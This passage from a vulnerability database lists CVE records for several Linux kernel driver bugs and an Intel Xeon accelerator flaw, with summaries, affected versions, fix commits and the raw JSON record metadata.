  "dataVersion": "5.2"
}

CVE-2024-35883 (GCVE-0-2024-35883)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

spi: mchp-pci1xxx: Fix a possible null pointer dereference in pci1xxx_spi_probe

Summary

In the Linux kernel, the following vulnerability has been resolved: spi: mchp-pci1xxx: Fix a possible null pointer dereference in pci1xxx_spi_probe In function pci1xxxx_spi_probe, there is a potential null pointer that may be caused by a failed memory allocation by the function devm_kzalloc. Hence, a null pointer check needs to be added to prevent null pointer dereferencing later in the code. To fix this issue, spi_bus->spi_int[iter] should be checked. The memory allocated by devm_kzalloc will be automatically released, so just directly return -ENOMEM without worrying about memory leaks.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/4b31a226097cf8cc3…
	https://git.kernel.org/stable/c/95e5d9eb26705a9a7…
	https://git.kernel.org/stable/c/1f886a7bfb3faf4c1…

Impacted products

Vendor

Product

Version

Linux

Affected: 1cc0cbea7167af524a7f7b2d0d2f19f7a324e807 , < 4b31a226097cf8cc3c9de5e855d97757fdb2bf06 (git)
Affected: 1cc0cbea7167af524a7f7b2d0d2f19f7a324e807 , < 95e5d9eb26705a9a76d2ef8bcba9ee2e195d653d (git)
Affected: 1cc0cbea7167af524a7f7b2d0d2f19f7a324e807 , < 1f886a7bfb3faf4c1021e73f045538008ce7634e (git)

Linux

Affected: 6.2
Unaffected: 0 , < 6.2 (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.510Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4b31a226097cf8cc3c9de5e855d97757fdb2bf06"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95e5d9eb26705a9a76d2ef8bcba9ee2e195d653d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1f886a7bfb3faf4c1021e73f045538008ce7634e"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35883",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:41:14.519332Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:16.510Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/spi/spi-pci1xxxx.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "4b31a226097cf8cc3c9de5e855d97757fdb2bf06",
              "status": "affected",
              "version": "1cc0cbea7167af524a7f7b2d0d2f19f7a324e807",
              "versionType": "git"
            },
            {
              "lessThan": "95e5d9eb26705a9a76d2ef8bcba9ee2e195d653d",
              "status": "affected",
              "version": "1cc0cbea7167af524a7f7b2d0d2f19f7a324e807",
              "versionType": "git"
            },
            {
              "lessThan": "1f886a7bfb3faf4c1021e73f045538008ce7634e",
              "status": "affected",
              "version": "1cc0cbea7167af524a7f7b2d0d2f19f7a324e807",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/spi/spi-pci1xxxx.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.2"
            },
            {
              "lessThan": "6.2",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.2",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nspi: mchp-pci1xxx: Fix a possible null pointer dereference in pci1xxx_spi_probe\n\nIn function pci1xxxx_spi_probe, there is a potential null pointer that\nmay be caused by a failed memory allocation by the function devm_kzalloc.\nHence, a null pointer check needs to be added to prevent null pointer\ndereferencing later in the code.\n\nTo fix this issue, spi_bus-\u003espi_int[iter] should be checked. The memory\nallocated by devm_kzalloc will be automatically released, so just directly\nreturn -ENOMEM without worrying about memory leaks."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:32.530Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/4b31a226097cf8cc3c9de5e855d97757fdb2bf06"
        },
        {
          "url": "https://git.kernel.org/stable/c/95e5d9eb26705a9a76d2ef8bcba9ee2e195d653d"
        },
        {
          "url": "https://git.kernel.org/stable/c/1f886a7bfb3faf4c1021e73f045538008ce7634e"
        }
      ],
      "title": "spi: mchp-pci1xxx: Fix a possible null pointer dereference in pci1xxx_spi_probe",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35883",
    "datePublished": "2024-05-19T08:34:40.035Z",
    "dateReserved": "2024-05-17T13:50:33.112Z",
    "dateUpdated": "2025-05-04T09:07:32.530Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35920 (GCVE-0-2024-35920)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-05-04 09:08

Title

media: mediatek: vcodec: adding lock to protect decoder context list

Summary

In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: adding lock to protect decoder context list Add a lock for the ctx_list, to avoid accessing a NULL pointer within the 'vpu_dec_ipi_handler' function when the ctx_list has been deleted due to an unexpected behavior on the SCP IP block. Hardware name: Google juniper sku16 board (DT) pstate: 20400005 (nzCv daif +PAN -UAO -TCO BTYPE=--) pc : vpu_dec_ipi_handler+0x58/0x1f8 [mtk_vcodec_dec] lr : scp_ipi_handler+0xd0/0x194 [mtk_scp] sp : ffffffc0131dbbd0 x29: ffffffc0131dbbd0 x28: 0000000000000000 x27: ffffff9bb277f348 x26: ffffff9bb242ad00 x25: ffffffd2d440d3b8 x24: ffffffd2a13ff1d4 x23: ffffff9bb7fe85a0 x22: ffffffc0133fbdb0 x21: 0000000000000010 x20: ffffff9b050ea328 x19: ffffffc0131dbc08 x18: 0000000000001000 x17: 0000000000000000 x16: ffffffd2d461c6e0 x15: 0000000000000242 x14: 000000000000018f x13: 000000000000004d x12: 0000000000000000 x11: 0000000000000001 x10: fffffffffffffff0 x9 : ffffff9bb6e793a8 x8 : 0000000000000000 x7 : 0000000000000000 x6 : 000000000000003f x5 : 0000000000000040 x4 : fffffffffffffff0 x3 : 0000000000000020 x2 : ffffff9bb6e79080 x1 : 0000000000000010 x0 : ffffffc0131dbc08 Call trace: vpu_dec_ipi_handler+0x58/0x1f8 [mtk_vcodec_dec (HASH:6c3f 2)] scp_ipi_handler+0xd0/0x194 [mtk_scp (HASH:7046 3)] mt8183_scp_irq_handler+0x44/0x88 [mtk_scp (HASH:7046 3)] scp_irq_handler+0x48/0x90 [mtk_scp (HASH:7046 3)] irq_thread_fn+0x38/0x94 irq_thread+0x100/0x1c0 kthread+0x140/0x1fc ret_from_fork+0x10/0x30 Code: 54000088 f94ca50a eb14015f 54000060 (f9400108) ---[ end trace ace43ce36cbd5c93 ]--- Kernel panic - not syncing: Oops: Fatal exception SMP: stopping secondary CPUs Kernel Offset: 0x12c4000000 from 0xffffffc010000000 PHYS_OFFSET: 0xffffffe580000000 CPU features: 0x08240002,2188200c Memory Limit: none

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0a2dc707aa42214f9…
	https://git.kernel.org/stable/c/23aaf824121055ba8…
	https://git.kernel.org/stable/c/6467cda18c9f9b5f2…

Impacted products

Vendor

Product

Version

Linux

Affected: 655b86e52eacdce79c2e02c5ec7258a97fcc2e4a , < 0a2dc707aa42214f9c4827bd57e344e29a0841d6 (git)
Affected: 655b86e52eacdce79c2e02c5ec7258a97fcc2e4a , < 23aaf824121055ba81b55f75444355bd83c8eb38 (git)
Affected: 655b86e52eacdce79c2e02c5ec7258a97fcc2e4a , < 6467cda18c9f9b5f2f9a0aa1e2861c653e41f382 (git)

Linux

Affected: 6.6
Unaffected: 0 , < 6.6 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35920",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:38:32.899934Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:41:01.161Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.045Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0a2dc707aa42214f9c4827bd57e344e29a0841d6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/23aaf824121055ba81b55f75444355bd83c8eb38"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6467cda18c9f9b5f2f9a0aa1e2861c653e41f382"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/platform/mediatek/vcodec/common/mtk_vcodec_fw_vpu.c",
            "drivers/media/platform/mediatek/vcodec/decoder/mtk_vcodec_dec_drv.c",
            "drivers/media/platform/mediatek/vcodec/decoder/mtk_vcodec_dec_drv.h",
            "drivers/media/platform/mediatek/vcodec/decoder/vdec_vpu_if.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0a2dc707aa42214f9c4827bd57e344e29a0841d6",
              "status": "affected",
              "version": "655b86e52eacdce79c2e02c5ec7258a97fcc2e4a",
              "versionType": "git"
            },
            {
              "lessThan": "23aaf824121055ba81b55f75444355bd83c8eb38",
              "status": "affected",
              "version": "655b86e52eacdce79c2e02c5ec7258a97fcc2e4a",
              "versionType": "git"
            },
            {
              "lessThan": "6467cda18c9f9b5f2f9a0aa1e2861c653e41f382",
              "status": "affected",
              "version": "655b86e52eacdce79c2e02c5ec7258a97fcc2e4a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/media/platform/mediatek/vcodec/common/mtk_vcodec_fw_vpu.c",
            "drivers/media/platform/mediatek/vcodec/decoder/mtk_vcodec_dec_drv.c",
            "drivers/media/platform/mediatek/vcodec/decoder/mtk_vcodec_dec_drv.h",
            "drivers/media/platform/mediatek/vcodec/decoder/vdec_vpu_if.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.6"
            },
            {
              "lessThan": "6.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: mediatek: vcodec: adding lock to protect decoder context list\n\nAdd a lock for the ctx_list, to avoid accessing a NULL pointer\nwithin the \u0027vpu_dec_ipi_handler\u0027 function when the ctx_list has\nbeen deleted due to an unexpected behavior on the SCP IP block.\n\nHardware name: Google juniper sku16 board (DT)\npstate: 20400005 (nzCv daif +PAN -UAO -TCO BTYPE=--)\npc : vpu_dec_ipi_handler+0x58/0x1f8 [mtk_vcodec_dec]\nlr : scp_ipi_handler+0xd0/0x194 [mtk_scp]\nsp : ffffffc0131dbbd0\nx29: ffffffc0131dbbd0 x28: 0000000000000000\nx27: ffffff9bb277f348 x26: ffffff9bb242ad00\nx25: ffffffd2d440d3b8 x24: ffffffd2a13ff1d4\nx23: ffffff9bb7fe85a0 x22: ffffffc0133fbdb0\nx21: 0000000000000010 x20: ffffff9b050ea328\nx19: ffffffc0131dbc08 x18: 0000000000001000\nx17: 0000000000000000 x16: ffffffd2d461c6e0\nx15: 0000000000000242 x14: 000000000000018f\nx13: 000000000000004d x12: 0000000000000000\nx11: 0000000000000001 x10: fffffffffffffff0\nx9 : ffffff9bb6e793a8 x8 : 0000000000000000\nx7 : 0000000000000000 x6 : 000000000000003f\nx5 : 0000000000000040 x4 : fffffffffffffff0\nx3 : 0000000000000020 x2 : ffffff9bb6e79080\nx1 : 0000000000000010 x0 : ffffffc0131dbc08\nCall trace:\nvpu_dec_ipi_handler+0x58/0x1f8 [mtk_vcodec_dec (HASH:6c3f 2)]\nscp_ipi_handler+0xd0/0x194 [mtk_scp (HASH:7046 3)]\nmt8183_scp_irq_handler+0x44/0x88 [mtk_scp (HASH:7046 3)]\nscp_irq_handler+0x48/0x90 [mtk_scp (HASH:7046 3)]\nirq_thread_fn+0x38/0x94\nirq_thread+0x100/0x1c0\nkthread+0x140/0x1fc\nret_from_fork+0x10/0x30\nCode: 54000088 f94ca50a eb14015f 54000060 (f9400108)\n---[ end trace ace43ce36cbd5c93 ]---\nKernel panic - not syncing: Oops: Fatal exception\nSMP: stopping secondary CPUs\nKernel Offset: 0x12c4000000 from 0xffffffc010000000\nPHYS_OFFSET: 0xffffffe580000000\nCPU features: 0x08240002,2188200c\nMemory Limit: none"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:24.303Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/0a2dc707aa42214f9c4827bd57e344e29a0841d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/23aaf824121055ba81b55f75444355bd83c8eb38"
        },
        {
          "url": "https://git.kernel.org/stable/c/6467cda18c9f9b5f2f9a0aa1e2861c653e41f382"
        }
      ],
      "title": "media: mediatek: vcodec: adding lock to protect decoder context list",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35920",
    "datePublished": "2024-05-19T10:10:32.379Z",
    "dateReserved": "2024-05-17T13:50:33.124Z",
    "dateUpdated": "2025-05-04T09:08:24.303Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-21823 (GCVE-0-2024-21823)

Vulnerability from cvelistv5 – Published: 2024-05-16 20:46 – Updated: 2024-08-14 20:45

Summary

Hardware logic with insecure de-synchronization in Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors may allow an authorized user to potentially enable escalation of privilege local access

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H

CWE

escalation of privilege
CWE-1264 - Hardware Logic with Insecure De-Synchronization between Control and Data Channels

Assigner

intel

References

URL

Tags

	https://www.intel.com/content/www/us/en/security-…
	https://lists.fedoraproject.org/archives/list/pac…
	http://www.openwall.com/lists/oss-security/2024/05/15/1
	https://lists.fedoraproject.org/archives/list/pac…

Impacted products

	Vendor	Product	Version
	n/a	Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors	Affected: See references

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T22:27:36.291Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01084.html",
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01084.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/05/15/1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-21823",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-23T18:02:56.696203Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-400",
                "description": "CWE-400 Uncontrolled Resource Consumption",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-08T14:39:32.573Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "See references"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Hardware logic with insecure de-synchronization in Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors may allow an authorized user to potentially enable escalation of privilege local access"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "escalation of privilege",
              "lang": "en"
            },
            {
              "cweId": "CWE-1264",
              "description": "Hardware Logic with Insecure De-Synchronization between Control and Data Channels",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-08-14T20:45:24.842Z",
        "orgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
        "shortName": "intel"
      },
      "references": [
        {
          "name": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01084.html",
          "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01084.html"
        },
        {
          "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/",
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OTB4HWU2PTVW5NEYHHLOCXDKG3PYA534/"
        },
        {
          "name": "http://www.openwall.com/lists/oss-security/2024/05/15/1",
          "url": "http://www.openwall.com/lists/oss-security/2024/05/15/1"
        },
        {
          "name": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/",
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DW2MIOIMOFUSNLHLRYX23AFR36BMKD65/"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "6dda929c-bb53-4a77-a76d-48e79601a1ce",
    "assignerShortName": "intel",
    "cveId": "CVE-2024-21823",
    "datePublished": "2024-05-16T20:46:57.735Z",
    "dateReserved": "2024-01-24T04:00:22.601Z",
    "dateUpdated": "2024-08-14T20:45:24.842Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27039 (GCVE-0-2024-27039)

Vulnerability from cvelistv5 – Published: 2024-05-01 12:53 – Updated: 2025-05-04 09:02

Title

clk: hisilicon: hi3559a: Fix an erroneous devm_kfree()

Summary

In the Linux kernel, the following vulnerability has been resolved: clk: hisilicon: hi3559a: Fix an erroneous devm_kfree() 'p_clk' is an array allocated just before the for loop for all clk that need to be registered. It is incremented at each loop iteration. If a clk_register() call fails, 'p_clk' may point to something different from what should be freed. The best we can do, is to avoid this wrong release of memory.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3f8445f1c746fda18…
	https://git.kernel.org/stable/c/e0b0d1c46a2ce1e46…
	https://git.kernel.org/stable/c/95d1f1228c1bb5480…
	https://git.kernel.org/stable/c/2cc572e0085ebd4b6…
	https://git.kernel.org/stable/c/d575765b1b62e8bdb…
	https://git.kernel.org/stable/c/64c6a38136b74a2f1…

Impacted products

Vendor

Product

Version

Linux

Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < 3f8445f1c746fda180a7f75372ed06b24e9cefe2 (git)
Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < e0b0d1c46a2ce1e46b79d004a7270fdef872e097 (git)
Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < 95d1f1228c1bb54803ae57525b76db60e99b37e4 (git)
Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < 2cc572e0085ebd4b662b74a0f43222bc00df9a00 (git)
Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < d575765b1b62e8bdb00af11caa1aabeb01763d9f (git)
Affected: 6c81966107dc0caa5d2ebedbcebb5f10d865064d , < 64c6a38136b74a2f18c42199830975edd9fbc379 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.153 , ≤ 5.15.* (semver)
Unaffected: 6.1.83 , ≤ 6.1.* (semver)
Unaffected: 6.6.23 , ≤ 6.6.* (semver)
Unaffected: 6.7.11 , ≤ 6.7.* (semver)
Unaffected: 6.8.2 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27039",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T16:17:48.442556Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:46:32.395Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.865Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3f8445f1c746fda180a7f75372ed06b24e9cefe2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e0b0d1c46a2ce1e46b79d004a7270fdef872e097"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95d1f1228c1bb54803ae57525b76db60e99b37e4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2cc572e0085ebd4b662b74a0f43222bc00df9a00"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d575765b1b62e8bdb00af11caa1aabeb01763d9f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/64c6a38136b74a2f18c42199830975edd9fbc379"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/hisilicon/clk-hi3559a.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3f8445f1c746fda180a7f75372ed06b24e9cefe2",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            },
            {
              "lessThan": "e0b0d1c46a2ce1e46b79d004a7270fdef872e097",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            },
            {
              "lessThan": "95d1f1228c1bb54803ae57525b76db60e99b37e4",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            },
            {
              "lessThan": "2cc572e0085ebd4b662b74a0f43222bc00df9a00",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            },
            {
              "lessThan": "d575765b1b62e8bdb00af11caa1aabeb01763d9f",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            },
            {
              "lessThan": "64c6a38136b74a2f18c42199830975edd9fbc379",
              "status": "affected",
              "version": "6c81966107dc0caa5d2ebedbcebb5f10d865064d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/clk/hisilicon/clk-hi3559a.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.153",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
